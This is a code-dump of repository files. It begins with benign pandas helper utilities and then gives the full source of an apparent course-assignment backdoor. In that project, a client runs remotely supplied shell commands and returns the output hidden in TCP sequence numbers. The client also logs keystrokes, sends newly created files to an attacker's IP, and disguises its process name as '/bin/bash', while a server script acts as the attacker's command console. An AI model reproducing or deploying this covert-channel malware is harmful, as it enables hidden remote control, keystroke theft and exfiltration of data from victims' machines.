    categories. This can be useful when a column has many possible values,
    some of which are extremely rare, and we want to consider only the ones
    that occur relatively frequently.

    The user can either specify the number of categories to include or set
    a threshold for the minimum number of occurrences. One of `n_categories`
    and `threshold` should be None, while the other should be an integer.

    Parameters
    -----------
    col: str
        Name of column to filter on.
    n_categories: int, None
        Optional - # of categories to include (i.e. top 5 most common
        categories).
    threshold: int, None
        Optional - Value count threshold to include (i.e. all categories that
        occur at least 10 times).

    Returns
    --------
    pd.DataFrame
    """
    # Exactly one of the two filtering modes must be specified.
    assert bool(n_categories) + bool(threshold) == 1

    if n_categories is not None:
        keep = df[col].value_counts(ascending=False).head(n_categories).index
        return df[df[col].isin(keep)]
    return df.groupby(col).filter(lambda grp: len(grp) >= threshold)
@pf.register_series_method
def vcounts(df_col, **kwargs):
    """Return both the raw and normalized value_counts of a series.

    Parameters
    -----------
    Most parameters in value_counts() are available (i.e. `sort`, `ascending`,
    `dropna`), with the obvious exception of `normalize` since that is handled
    automatically.

    Returns
    --------
    pd.DataFrame

    Examples
    ---------
    df.colname.vcounts()
    """
    # `normalize` is handled internally - discard it if the caller passed one.
    kwargs.pop('normalize', None)
    raw = df_col.value_counts(**kwargs)
    normed = df_col.value_counts(normalize=True, **kwargs)
    # Pandas seems to have problem merging on bool col/index. Could use
    # pd.concat but unsure if order is consistent in case of ties.
    if raw.name is None:
        raw.name = 'raw'
        normed.name = 'normed'
    res = pd.merge(raw, normed,
                   how='left', left_index=True, right_index=True,
                   suffixes=['_raw_count', '_normed_count'])\
            .reset_index()
    # Recover the original column name from the suffixed merge output.
    col_name = '_'.join(res.columns[1].split('_')[:-2])
    return res.rename({'index': col_name}, axis=1)
@pf.register_series_method
@pf.register_dataframe_method
def pprint(df, truncate_text=True):
    """Display a dataframe or series as a rendered HTML table in
    Jupyter notebooks. Useful when printing multiple outputs in a cell.

    Parameters
    ----------
    truncate_text: bool
        If True, long strings will be truncated to maintain a reasonable
        row height. If False, the whole string will be displayed, which can
        result in massive outputs.
    """
    if isinstance(df, pd.core.series.Series):
        df = pd.DataFrame(df)
    if not truncate_text:
        # Render every string in full - can produce very large outputs.
        display(HTML(df.to_html()))
    else:
        display(df)
@pf.register_series_method
@pf.register_dataframe_method
def lambda_sort(df, func, **kwargs):
    """Sort a DataFrame or Series by a function that takes itself as input.
    For example, we can sort by the absolute value of a column or the sum of
    2 different columns.

    Parameters
    -----------
    func: function
        Callable function or lambda expression to sort by.
        (eg: lambda x: abs(x))
    **kwargs: additional keyword args will be passed to the sort_values()
        method.

    Returns
    --------
    pd.DataFrame

    Examples
    ---------
    # NOTE: example corrected - np.arange(8) puts (4, 5) in row 2, and
    # sorting by x.a * x.b gives the order 3, 0, 1, 2 (products -42, 0, 6,
    # 20), not the order the old docstring showed.
    >>> df = pd.DataFrame(np.arange(8).reshape((4, 2)), columns=['a', 'b'])
    >>> df.loc[3, 'a'] *= -1
    >>> df

       a  b
    0  0  1
    1  2  3
    2  4  5
    3 -6  7

    >>> df.lambda_sort(lambda x: x.a * x.b)

       a  b
    3 -6  7
    0  0  1
    1  2  3
    2  4  5
    """
    col = 'lambda_col'
    df = df.copy()
    if isinstance(df, pd.core.series.Series):
        df = pd.DataFrame(df)
    # Materialize the sort key as a temporary column, sort on it, drop it.
    df[col] = func(df)
    return df.sort_values(col, **kwargs).drop(col, axis=1)
@pf.register_dataframe_method
def coalesce(df, cols):
    """Create a column where each row contains the first non-null value for
    that row from a list of columns.

    Parameters
    ----------
    cols: list[str]
        Names of columns to coalesce over.

    Returns
    -------
    pd.Series
    """
    result = df[cols[0]].copy()
    # Fill from each subsequent column, stopping early once nothing is null.
    for fallback in cols[1:]:
        if not result.isnull().sum() > 0:
            break
        result.fillna(df[fallback], inplace=True)
    return result
@pf.register_series_method
def stringify(list_col, join=True, ignore_terms=None, greedy_ignore=False,
              null=''):
    """Converts a df column of lists, possibly containing np.nan's, to strings.

    Parameters
    -----------
    join: bool
        If True, create the string by joining all items in each list/row. If
        False, simply return the first item in each list. Default True.
    ignore_terms: list, set
        Terms to drop from the column. If None, all terms will be retained.
        Ex: {'width=device-width'}
    greedy_ignore: bool
        If True, ignore_terms can be a list of prefixes. In other words,
        we will remove any strings in the list column that start with one of
        the ignore_terms even (as opposed to requiring an exact match.)
    null: str
        The value to replace null values with. For many pandas string methods,
        it is beneficial for this to be a string rather than np.nan.

    Returns
    -------
    pd.Series
    """
    ignore_terms = dict.fromkeys(ignore_terms or [])

    def process(x, join, ignore_terms, greedy_ignore, null):
        # Handles both np.nan and empty lists.
        if not isinstance(x, list) or not x:
            return null
        # Dict instead of set to maintain order
        # (dict-key operations would still change order).
        x = dict.fromkeys(map(str, x))
        if greedy_ignore:
            x = (term for term in x if not term.startswith(tuple(ignore_terms)))
        else:
            x = (term for term in x if term not in ignore_terms)
        # Return a string.
        if join:
            return ' '.join(x)
        else:
            # Bug fix: when every term was filtered out, `next(x)` raised
            # StopIteration inside Series.map. Fall back to `null` instead.
            return next(x, null)

    return list_col.map(partial(process, join=join, ignore_terms=ignore_terms,
                                greedy_ignore=greedy_ignore, null=null))
@pf.register_series_method
def is_list_col(col):
    """Determine whether a column is a list column. These are columns
    resulting from the protobuf format, where we end up with a situation
    where rows either contains lists or np.nan.

    Parameters
    -----------
    col: pd.Series
        The column to evaluate.

    Returns
    --------
    bool
    """
    # Filter out nulls first otherwise type could be np.nan instead of list.
    non_null = col.dropna()
    if non_null.empty:
        return False
    return isinstance(non_null.iloc[0], list)
@pf.register_dataframe_method
@pf.register_series_method
def verbose_plot(df, nrows=None, **kwargs):
    """Plot data and also print it out as a table. For example, this is
    nice when finding quantiles, where it's often helpful to plot them for a
    quick visual snapshot but also to examine the table of values for more
    details.

    Parameters
    ----------
    nrows: int or None
        If provided, will truncate the printed table. Otherwise all rows will
        be shown.
    kwargs: any
        Arguments to pass to the plot method.

    Returns
    -------
    None

    Examples
    --------
    df.bids.quantile(np.arange(0, 1, .1)).verbose_plot(kind='bar', color='red')
    """
    df.plot(**kwargs)
    # head(None) returns the full frame, matching the docstring.
    df.head(nrows).pprint()
    # plt is deliberately not imported by this module (notebook use is
    # assumed), so plt.show() may raise NameError. Fix: catch Exception
    # rather than a bare except, which also swallowed KeyboardInterrupt
    # and SystemExit.
    try:
        plt.show()
    except Exception:
        pass
@pf.register_dataframe_method
def fuzzy_groupby(df, col, model=None, cats=5, fuzzy_col=True,
                  globalize_vecs='_vecs', **kwargs):
    """Pandas method to group by a string column using fuzzy matching via
    SentenceTransformers. Categories can be passed in or selected
    automatically as the most common values in the data.

    Note: this method imports from the sentence_transformers package, which
    is deliberately NOT an htools dependency (niche/experimental feature).

    Parameters
    ----------
    col: str
        Column name to group by.
    model: SentenceTransformer or None
        Defaults to the 'all-MiniLM-L6-v2' model (384-dim embeddings),
        which should handle texts of varying lengths, though YMMV.
    cats: Iterable[str] or int
        Each item in col is mapped to one of these categories via cosine
        similarity. An integer means "use the n most common values in col"
        (no guarantee these are good choices for every dataset).
    fuzzy_col: bool or str
        If truthy, add a new column with the assigned category. A string is
        used as the column name; True defaults to f'{col}_fuzzy'.
    globalize_vecs: str
        If truthy, stash the value embeddings in a global of this name so
        the method can still return a groupby directly, e.g.
        df.fuzzy_groupby('color').age.mean()
    kwargs: any
        Extra kwargs forwarded to model.encode().

    Returns
    -------
    pd.DataFrameGroupBy
    """
    from sentence_transformers.util import cos_sim

    if not model:
        from sentence_transformers import SentenceTransformer
        model = SentenceTransformer('all-MiniLM-L6-v2')
    if isinstance(cats, Number):
        cats = df[col].value_counts().head(cats).index.tolist()

    uniques = df[col].unique()
    encode_kwargs = {'show_progress_bar': True, **kwargs}
    cat_embeddings = model.encode(cats, **encode_kwargs)
    val_embeddings = model.encode(uniques, **encode_kwargs)

    # Assign each unique value to its most similar category.
    similarities = cos_sim(val_embeddings, cat_embeddings)
    val2cat = {val: cats[idx]
               for val, idx in zip(uniques, similarities.argmax(1))}
    assigned = df[col].map(val2cat)

    if fuzzy_col:
        new_name = fuzzy_col if isinstance(fuzzy_col, str) else f'{col}_fuzzy'
        df[new_name] = assigned
    if globalize_vecs:
        set_module_global('__main__', globalize_vecs, val_embeddings)
    return df.groupby(assigned)
def anti_join(df_left, df_right, left_on=None, right_on=None, **kwargs):
    """Remove rows present in rhs from lhs.

    Parameters
    ----------
    df_left: pd.DataFrame
        The dataframe containing the initial rows to subtract from.
    df_right: pd.DataFrame
        The dataframe containing rows to "subtract" from `df_left`.
    left_on: str or list[str]
        Column name(s) to join on.
    right_on: str or list[str]
        If not provided, the default is to use the same values as `left_on`.
    kwargs: any
        Will be passed to the merge operation. Ex: `left_index=True`.

    Returns
    -------
    pd.DataFrame: Contains all rows that are present in `df_left` but not in
        `df_right`.
    """
    # Sentinel column lets us spot which merged rows found a match in rhs.
    marked = df_right.copy()
    marked['XX_RHS_XX'] = True
    joined = df_left.merge(
        marked, how='left', left_on=left_on,
        right_on=right_on or left_on, suffixes=['', '_rhs'], **kwargs
    )
    # Rows whose sentinel is null had no match in rhs; keep only lhs columns.
    unmatched = joined.XX_RHS_XX.isnull()
    return joined.loc[unmatched, df_left.columns]
def highlight_rows(row, fn, highlight_color='yellow', default_color='white'):
    """Use with pd.style.apply to highlight certain rows. `row` is passed
    in automatically by the pandas method.

    Parameters
    ----------
    row: row of a pandas DataFrame
        Never passed in manually by user.
    fn: function
        Takes row as input and returns True if it should be highlighted,
        False otherwise.
    highlight_color: str
        Color to display highlighted rows in.
    default_color: str
        Color to display un-highlighted rows in.

    Examples
    --------
    highlight_shared = partial(highlight_rows, fn=lambda x: x.cat in names)
    df.style.apply(highlight_shared, axis=1)
    """
    if fn(row):
        chosen = highlight_color
    else:
        chosen = default_color
    style = f'background-color: {chosen}'
    # One style string per cell in the row.
    return [style for _ in row.values]
def paginate(d, seen=()):
    """Page through a dict of dataframes, showing for each column:
    name, # unique, % null, standard deviation, min, max, mean, 1 non-null row

    Parameters
    ----------
    d: dict[pd.DataFrame]
    seen: Iterable
        If provided, this should be a list-like container of strings (or
        whatever type you use as keys in `d`). These are the names of the df's
        you've already explored. A common workflow is to have a line like
        `seen = paginate(name2df, seen)`. This way if you choose to exit the
        loop for some additional EDA, you can easily pick up where you left
        off.

    Returns
    -------
    set: the names explored so far (pass back in as `seen` to resume).
    """
    seen = set(seen)
    for i, (k, v) in enumerate(d.items(), 1):
        # Skip dataframes the user already paged through.
        if k in seen: continue
        print(spacer())
        print(f'{i}. {k}')
        print(v.shape)
        # Fraction of nulls per column, as a single-column frame.
        nulls = pd.DataFrame(v.isnull().mean().T)
        # Get 1 non-null example for each column.
        examples = pd.concat([v[col].dropna().head(1).reset_index(drop=True)
                              for col in v], axis=1).T
        # Summary stats only make sense for numeric/bool columns.
        stats = v.select_dtypes([np.number, bool]) \
            .agg([np.mean, np.std, min, max]).T
        # Assemble the per-column report: n_unique | pct_null | stats | example.
        # '0_x'/'0_y' are the collision-suffixed names of the first two
        # single-column frames merged in.
        pd.DataFrame(v.nunique().sort_index()) \
            .merge(nulls, left_index=True, right_index=True) \
            .merge(stats, how='left', left_index=True, right_index=True) \
            .merge(examples, left_index=True, right_index=True) \
            .rename(columns={'0_x': 'n_unique', '0_y': 'pct_null',
                             0: 'example'}) \
            .fillna('') \
            .pprint(False)
        # Block until the user either continues (ENTER) or exits ('e').
        while True:
            cmd = input('Press <ENTER> to continue or press e to exit.')
            if cmd == '':
                seen.add(k)
                break
            elif cmd == 'e':
                return seen
    return seen
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,156 | khangtran123/Covert-Communication-Application | refs/heads/master | /bkutil.py | #!/usr/bin/python3
def message_to_bits(message) -> str:
    """Convert a message to its binary representation.

    Each character is mapped to its code point rendered in binary and
    zero-padded on the left to at least 8 characters, then all pieces are
    concatenated.

    Arguments:
        message {str} -- message that will have each character converted to bits

    Returns:
        str -- a string containing the binary of message
    """
    # ''.join avoids the quadratic cost of repeated string concatenation;
    # format(x, '08b') is equivalent to bin(x)[2:].zfill(8).
    return ''.join(format(ord(char), '08b') for char in message)
def message_spliter(msg: str):
    """Split a bit string into 32-bit chunks.

    Arguments:
        msg {str} -- string that will be split into chunks

    Returns:
        str -- the message itself, left-padded with zeros to 32 bits, when
               it fits in a single chunk
        list -- list of strings of (at most) 32 bits each when the message
                spans several chunks

    NOTE(review): callers (packatizer) accept both return types, so the
    historical str/list asymmetry is preserved for backward compatibility.
    """
    length = 32  # bits available in a TCP sequence number
    # Short messages fit in one chunk; zfill pads on the left so the value
    # is unchanged when parsed as a binary number (identity when already
    # exactly `length` bits).
    if len(msg) <= length:
        return msg.zfill(length)
    # Longer messages are cut into consecutive 32-bit slices; the final
    # slice may be shorter (the receiver re-pads it via lengthChecker).
    return [msg[i:i + length] for i in range(0, len(msg), length)]
def lengthChecker(field):
    """Pad the binary form of a value up to the nearest multiple of 8 bits.

    Arguments:
        field {int} -- integer (e.g. a TCP sequence number) whose binary
                       representation should be byte-aligned

    Returns:
        str -- binary string, left-padded with zeros to a multiple of 8.
               Values already needing 32 or more bits are returned unpadded
               (matching the original branch ladder's behaviour).
    """
    bits = bin(field)[2:]
    if len(bits) >= 32:
        return bits
    # Round the length up to the next multiple of 8 (ceiling division);
    # zfill is a no-op when the length is already a multiple of 8.
    return bits.zfill(-(-len(bits) // 8) * 8)
def text_from_bits(bits, encoding='utf-8', errors='surrogatepass'):
    """Convert a binary string back to text.

    Arguments:
        bits {str} -- string of '0'/'1' characters to decode

    Keyword Arguments:
        encoding {str} -- encoding of the returned string (default: 'utf-8')
        errors {str} -- decode error handling (default: 'surrogatepass')

    Returns:
        str -- the decoded characters; a NUL character if the value is zero
    """
    value = int(bits, 2)
    # Round the bit length up to whole bytes for to_bytes.
    n_bytes = (value.bit_length() + 7) // 8
    decoded = value.to_bytes(n_bytes, 'big').decode(encoding, errors)
    return decoded or '\0'
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,157 | khangtran123/Covert-Communication-Application | refs/heads/master | /server.py | #!/usr/bin/python3
import optparse
import os.path
import subprocess
import sys
from packetutil import *
from bkutil import *
from multiprocessing import Process
from cryptoutil import encrypt, decrypt
from scapy.all import *
import _thread
import argparse
import setproctitle
# parse command line argument
arg_parser = argparse.ArgumentParser(
    prog='Backdoor',
    description='COMP 8505 Final Assignment by Peyman Tehrani Parsa & Khang Tran'
)
# -p may be given with no value (nargs='?'), in which case const=8888 is used.
arg_parser.add_argument('-p', dest='port', type = int, help = 'victim PORT', default=8888, const=8888, nargs='?')
arg_parser.add_argument('-i', dest='ip', type = str, help = 'victim IP', required=True)
args = arg_parser.parse_args()
#Global vars
TTL = 222     # TTL stamped on packets we send so the victim can identify them
TTLKEY = 234  # TTL expected on covert packets coming back from the victim
victim = (args.ip, args.port)
messages = []  # accumulates decoded 32-bit chunks until an end-of-message flag
def secret_send(msg: str, type: str = 'command'):
    """Covertly transmit *msg* to the victim inside TCP sequence numbers.

    Keyword arguments:
    msg -- payload being sent
    type -- file or command (default: command)
    """
    bit_chunks = message_spliter(message_to_bits(msg))
    send(packatizer(bit_chunks, TTL, victim), verbose=False)
    # A command is terminated with an URG-flagged packet so the victim
    # knows the whole payload has arrived and can execute it.
    if type == "command":
        send(IP(dst=victim[0], ttl=TTL)/TCP(dport=victim[1], flags="U"))
def server():
    """Prompt user for the command they would like to execute on the backdoor.

    Loops forever reading commands from stdin:
      - "exit"   -> terminate this program
      - "keylog" -> request the victim's keystroke log (PSH-flagged packet)
      - anything else is sent covertly for remote shell execution
    """
    while True:
        try:
            command = input("\033[92m{} READY\033[0m\n".format(victim[0]))
        except EOFError as e:
            # NOTE(review): on EOFError `command` is left unbound, so the
            # print below would raise NameError — confirm intended.
            print(e)
        # Print the command so that the user knows what they typed.
        print(command)
        # If the user types "exit". shutdown the program.
        if(command == "exit"):
            sys.exit()
        elif(command == "keylog"):
            # PSH flag alone signals "send me your keylog file".
            send(IP(dst=victim[0], ttl=TTL)/TCP(dport=victim[1], flags="P"))
        else:
            secret_send(command)
def commandResult(packet):
    """Extracts data from parsed packets.

    Packets with flag:
        0x40 (ECE) - packet carries data inside the TCP sequence number
        0x20 (URG) - end of message; print the accumulated payload
        0x08 (PSH) - file transfer; the payload holds the encrypted file
                     name and the accumulated chunks hold the file body

    Arguments:
        packet {scapy.packet} -- packet to be parsed
    """
    # TTLKEY is only read; `messages` is reassigned, so `global` is required.
    global TTLKEY
    global messages
    ttl = packet[IP].ttl
    # Only packets stamped with the agreed-upon TTL belong to the channel.
    if(packet.haslayer(IP) and ttl == TTLKEY):
        # checks if the flag has been set to know it contains the secret results
        flag = packet['TCP'].flags
        if flag == 0x40:
            field = packet[TCP].seq
            # Converts the bits to the nearest divisible by 8
            covertContent = lengthChecker(field)
            messages.append(text_from_bits(covertContent))
        # End Flag detected
        elif flag == 0x20:
            # [2:-2] strips the "b'" prefix and "'" suffix produced by the
            # victim's str(bytes) conversion; '\\n' becomes real newlines.
            payload = str(''.join(messages)[2:-2]).replace("\\n", '\n')
            print('\n', payload)
            messages = []
        elif flag == 0x08:
            # File-name packet: the raw payload is the AES-encrypted name.
            load = packet[TCP].load
            file_name = decrypt(load)
            if(file_name == "file.log"):
                print(" Keystroke Log File Extracted into /root/Documents/temp --> {}".format(file_name))
            else:
                print(" File Name --> {} --> was created. Check /root/Documents/temp".format(file_name))
            #checks if log file exists in specific directory
            file_directory = "/root/Documents/temp/{}".format(file_name)
            if os.path.isfile(file_directory):
                os.remove(file_directory)
            # Dump the accumulated chunks (same [2:-2] stripping as above).
            with open(file_directory, 'w+') as f:
                f.write('{}'.format(str(''.join(messages)[2:-2]).replace("\\n", '\n')))
            messages = []
def commandSniffer():
    """Sniff TCP traffic to/from the victim and hand each packet to
    commandResult, which filters by TTL/flags and extracts covert content.
    Blocks forever; intended to run in a daemon thread.
    """
    sniff(filter="tcp and host "+victim[0], prn=commandResult)
# Disguise this process in `ps` output.
setproctitle.setproctitle("/bin/bash") # set fake process name
# print(setproctitle.getproctitle())
# Sniff replies in the background while the foreground prompt loop runs.
sniffThread = threading.Thread(target=commandSniffer)
sniffThread.daemon = True
sniffThread.start()
server()
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,158 | khangtran123/Covert-Communication-Application | refs/heads/master | /file_monitoring.py | #!/usr/bin/python3
import sys
import time
import argparse
import os
import threading
import re
from bkutil import *
from packetutil import *
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from scapy.all import *
from cryptoutil import *
#logging.basicConfig(level=logging.DEBUG, format='(%(threadName)-10s) %(message)s',)
class Monitor(threading.Thread):
    """Observer thread that schedules watching directories and dispatches
    calls to event handlers.

    Arguments:
        threading {Thread} -- represents a thread of control
    """
    # Directory watched recursively for created/modified files.
    DIRECTORY_TO_WATCH = "/mnt/temp/"

    def __init__(self, addr):
        """This constructor should always be called with keyword arguments.

        Arguments:
            addr -- (ip, port) tuple of the remote endpoint, forwarded to
                    the Handler so it can exfiltrate new files.
        """
        threading.Thread.__init__(self)
        self.observer = Observer()
        self.addr = addr

    def run(self):
        """Overridden Thread entry point: start the watchdog observer and
        idle until interrupted.
        """
        print("Monitoring folder %s now" % self.DIRECTORY_TO_WATCH)
        # logging.debug('running')
        event_handler = Handler(self.addr)
        # parameters for observer (event handler, a directory to monitor,
        # recursive is enabled)
        self.observer.schedule(
            event_handler, self.DIRECTORY_TO_WATCH, recursive=True)
        self.observer.start()
        try:
            while True:
                time.sleep(5)
        # NOTE(review): bare except also catches KeyboardInterrupt/SystemExit;
        # presumably intentional so the observer is always stopped cleanly.
        except:
            self.observer.stop()
            print('Error')
        self.observer.join()
class Handler(FileSystemEventHandler):
    """Main handler if a file event leads to creation or modification.

    On file creation, the file's contents are read and exfiltrated covertly
    (bits packed into TCP sequence numbers), followed by a PSH packet
    carrying the AES-encrypted file name.

    Arguments:
        FileSystemEventHandler -- watchdog base handler whose methods are
                                  overridden here.
    """

    def __init__(self, addr):
        """This constructor should always be called with keyword arguments.

        Arguments:
            addr -- (ip, port) tuple of the remote endpoint.
        """
        self.addr = addr

    def on_any_event(self, event):
        """Overridden catch-all event handler."""
        # is_directory --> True if event was emitted for a directory
        if event.is_directory:
            return None
        # event_type --> The type of the event as a string. In this case, if a file is created
        elif event.event_type == 'created':
            # event.src_path --> Source path of the file system object that triggered this event.
            print("Received created event - %s." % event.src_path)
            print(self.addr)
            with open(event.src_path, 'r') as f:
                content = f.read()
            # Exfiltrate the file body in 32-bit covert chunks.
            # NOTE(review): 234 matches the client's covert-channel TTL —
            # confirm it should track that constant rather than hard-code.
            msg = message_to_bits(content)
            chunks = message_spliter(msg)
            packets = packatizer(chunks, 234, self.addr)
            send(packets, verbose=True)
            # Follow with the encrypted basename so the receiver knows what
            # file to write.
            direc = event.src_path.split('/')
            encrypted = encrypt(direc[-1])
            send(IP(dst=self.addr[0], ttl=234)/TCP(dport=self.addr[1], flags="P")/Raw(load=encrypted))
        elif event.event_type == 'modified':
            print("Received file modification event - %s." % event.src_path)
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,159 | khangtran123/Covert-Communication-Application | refs/heads/master | /linuxKey.py | import os
# Path of the keystroke log; overridable via the `pylogger_file` env var.
log_file = os.environ.get(
    'pylogger_file',
    os.path.expanduser('~/Documents/file.log')
)
# Allow setting the cancel key from environment args, Default: `
# (only the first character of the env value is used).
cancel_key = ord(
    os.environ.get(
        'pylogger_cancel',
        '`'
    )[0]
)
def OnKeyPress(event):
    """Keyboard hook callback: append the pressed key's name to the log file.

    Arguments:
        event -- Key down event
    """
    # Open in append mode per keystroke so the log survives crashes.
    with open(log_file, 'a') as log:
        log.write(f'{event.Key}\n')
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,160 | khangtran123/Covert-Communication-Application | refs/heads/master | /cryptoutil.py | #!/usr/bin/python3
from Crypto.Cipher import AES
encryptionKey = b'passyourwordssss'
IV = b'whatsthedealwith'
def encrypt(plaintext: str) -> str:
    """Encrypt data with the module-level key and IV.

    Arguments:
        plaintext {str} -- The piece of data to encrypt.

    Returns:
        str -- the encrypted data, as a byte string
    """
    # A fresh cipher object per call: CFB mode keeps internal stream state,
    # so a single object cannot be reused across messages. Reading the
    # module-level key/IV needs no `global` declaration.
    cipher = AES.new(encryptionKey, AES.MODE_CFB, IV=IV)
    return cipher.encrypt(bytearray(plaintext.encode('utf-8')))
def decrypt(ciphertext: str) -> str:
    """Decrypt data with the module-level key and IV.

    Arguments:
        ciphertext {str} -- The piece of data to decrypt.

    Returns:
        str -- the decrypted data (as long as *ciphertext*)
    """
    # Mirror of encrypt(): new cipher per message, same key/IV.
    cipher = AES.new(encryptionKey, AES.MODE_CFB, IV=IV)
    return cipher.decrypt(bytearray(ciphertext)).decode('utf-8')
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,161 | khangtran123/Covert-Communication-Application | refs/heads/master | /packetutil.py | #!/usr/bin/python3
from scapy.all import *
def packatizer(msg, TTL: int, addr: tuple):
    """Craft one scapy TCP packet per 32-bit chunk of covert data.

    Arguments:
        msg {list || str} -- chunk(s) of bits to store inside the sequence
            number of TCP packets; a plain string means a single packet
        TTL {int} -- used for packet identification during packet sniffing
        addr {tuple} -- the IP([0]) and PORT([1]) packet is being sent to

    Returns:
        [list] -- list of TCP scapy.packets
    """
    # message_spliter returns a str for single-chunk payloads and a list
    # for multi-chunk ones; anything else yields no packets.
    if isinstance(msg, str):
        return [craft(msg, TTL, addr)]
    if isinstance(msg, list):
        return [craft(chunk, TTL, addr) for chunk in msg]
    return []
def craft(data: str, TTL: int, addr: tuple) -> IP:
    """Build a single scapy TCP packet hiding *data* in the sequence number.

    Arguments:
        data {str} -- bit string stored inside the sequence number
        TTL {int} -- used for packet identification during packet sniffing
        addr {tuple} -- the IP([0]) and PORT([1]) packet is being sent to

    Returns:
        IP -- TCP scapy.packet
    """
    # Interpret the chunk as a base-2 integer; flags="E" (ECE) marks the
    # packet as carrying covert data for the sniffer on the other side.
    seq_value = int(str(data), 2)
    return IP(dst=addr[0], ttl=TTL)/TCP(dport=addr[1], seq=seq_value, flags="E")
| {"/server.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py"], "/file_monitoring.py": ["/bkutil.py", "/packetutil.py", "/cryptoutil.py"], "/client.py": ["/packetutil.py", "/bkutil.py", "/cryptoutil.py", "/file_monitoring.py", "/linuxKey.py"]} |
78,162 | khangtran123/Covert-Communication-Application | refs/heads/master | /client.py | #!/usr/bin/python3
import optparse
import os
import sys
import time
from packetutil import *
from bkutil import *
from multiprocessing import Process
from cryptoutil import *
from scapy.all import *
from file_monitoring import *
import _thread
import setproctitle
import argparse
import pyxhook
from linuxKey import OnKeyPress
# parse command line argument
arg_parser = argparse.ArgumentParser(
    prog='Backdoor',
    description='COMP 8505 Final Assignment by Peyman Tehrani Parsa & Khang Tran'
)
# -p may be given with no value (nargs='?'), in which case const=9999 is used.
arg_parser.add_argument('-p', dest='port', type = int, help = 'attackers PORT', default=9999, const=9999, nargs='?')
arg_parser.add_argument('-i', dest='ip', type = str, help = 'attackers IP', required=True)
args = arg_parser.parse_args()
#Global vars
TTL = 234     # TTL stamped on packets we send back to the attacker
TTLKEY = 222  # TTL expected on command packets coming from the attacker
attacker = (args.ip, args.port)
messages = []  # accumulates decoded 32-bit chunks until an end-of-message flag
def secret_send(msg: str, type: str, filename: str = "file"):
    """Send a file or plain text covertly to the attacker device.

    Arguments:
        msg {str} -- payload being sent
        type {str} -- specifies if content sent is file or command
        filename {str} -- name of file being sent (default:file)
    """
    bit_chunks = message_spliter(message_to_bits(msg))
    send(packatizer(bit_chunks, TTL, attacker), verbose=True)
    # Terminator packet: URG closes a command reply; PSH carries the
    # AES-encrypted file name for a file transfer.
    if type == "command":
        send(IP(dst=attacker[0], ttl=TTL)/TCP(dport=attacker[1], flags="U"))
    elif type == "file":
        send(IP(dst=attacker[0], ttl=TTL)/TCP(dport=attacker[1], flags="P")/Raw(load=encrypt(filename)))
def execPayload(command):
    """Execute a command in a shell and covertly send back its output.

    Arguments:
        command {str} -- A string, or a sequence of program arguments

    NOTE: shell=True on remotely supplied input is intentional here —
    this module *is* the remote shell of the backdoor.
    """
    proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    # Fix: communicate() drains both pipes concurrently; the previous
    # sequential stdout.read() + stderr.read() could deadlock once one
    # pipe's OS buffer filled up.
    out, err = proc.communicate()
    # str() of the bytes keeps the "b'...'" wrapper on purpose: the server
    # strips it with [2:-2], so the representation must stay unchanged.
    result = str(out + err)
    if(result == ""):
        result = "N/A"
    #print(result) DEBUG
    secret_send(result,"command")
def commandResult(packet):
    """Extracts data from parsed packets.

    Packets with flag:
        0x40 (ECE) - packet carries data inside the TCP sequence number
        0x20 (URG) - end of message; execute the accumulated command
        0x08 (PSH) - keylog request; send back the keystroke log file

    Arguments:
        packet {scapy.packet} -- packet to be parsed
    """
    # TTLKEY is only read; `messages` is reassigned, so `global` is required.
    global TTLKEY
    global messages
    ttl = packet[IP].ttl
    # Only packets stamped with the attacker's TTL belong to the channel.
    if(packet.haslayer(IP) and ttl == TTLKEY):
        # checks if the flag has been set to know it contains the secret results
        flag = packet['TCP'].flags
        if flag == 0x40:
            field = packet[TCP].seq
            # Re-pad the sequence number to whole bytes before decoding.
            covertContent = lengthChecker(field)
            messages.append(text_from_bits(covertContent))
        # End Flag detected
        elif flag == 0x20:
            # Full command received: run it and reset the accumulator.
            payload = ''.join(messages)
            execPayload(payload)
            messages = []
        elif flag == 0x08:
            # Keylog request: exfiltrate the keystroke log file.
            with open('/root/Documents/file.log','r') as f:
                secret_send(f.read(),"file","file.log")
def commandSniffer():
    """Sniff TCP traffic to/from the attacker and hand each packet to
    commandResult, which filters by TTL/flags and extracts covert commands.
    Blocks forever; intended to run in a daemon thread.
    """
    sniff(filter="tcp and host "+attacker[0], prn=commandResult)
# Disguise this process in `ps` output.
setproctitle.setproctitle("/bin/bash") # set fake process name
# Background workers: command sniffer, file-drop monitor, keylogger hook.
sniffThread = threading.Thread(target=commandSniffer)
